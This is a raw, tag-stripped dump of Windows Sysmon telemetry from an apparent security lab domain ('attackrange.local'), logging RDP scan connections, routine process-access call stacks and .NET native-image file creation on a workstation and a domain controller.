14:58:37.195{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55885-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050565Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:36.901{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63107-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050564Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:36.418{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58748-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050563Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:39.154{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91F4F4D79CFBF591D66D76BA5D3BBFCF,SHA256=B1728EEA6F0AC6D3E579A7D94957D9BB1CF317D8F43CF3CAACA70384255AB048,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.763{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9C0E-00000000BB01}6984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.747{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC20-607E-9C0E-00000000BB01}6984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.747{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC20-607E-9C0E-00000000BB01}6984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.716{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4c224|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4dd30|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+584fe|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+57f5f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+56e48|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1438C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+73c87|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+7522e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+14519|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a430|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x800000000000000080473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+2d73e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+16070|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+15184|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+17233|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a40c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac 10341000x800000000000000080472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.700{A7A01FEF-C0A6-607E-7805-00000000BB01}4247020C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50925376C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+976c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.685{A7A01FEF-EC1F-607E-9A0E-00000000BB01}4224NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TEM8J70651\Microsoft.VisualBasic.Compatibility.ni.dll.auxMD5=0304244128543E6ED8AEDF2254FB885F,SHA256=B237333A3C8B23AEC01ABFCB3C5A7F205A9197C1397E0920137B0C1E2F4F8FE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.685{A7A01FEF-EC1F-607E-9A0E-00000000BB01}4224NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TEM8J70651\Microsoft.VisualBasic.Compatibility.ni.dllMD5=C1CA410B838101460A6AC7AB380BF0E8,SHA256=20765DE7584FDCF15FCA1E34ECDF1ABBB595A42713657E2A7B9BAF51FE79B57B,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000080463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:40.638{A7A01FEF-EC1F-607E-9A0E-00000000BB01}4224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1080-0\Microsoft.VisualBasic.Compatibility.dll2021-04-20 14:58:40.638 10341000x800000000000000080462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.638{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.638{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.638{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 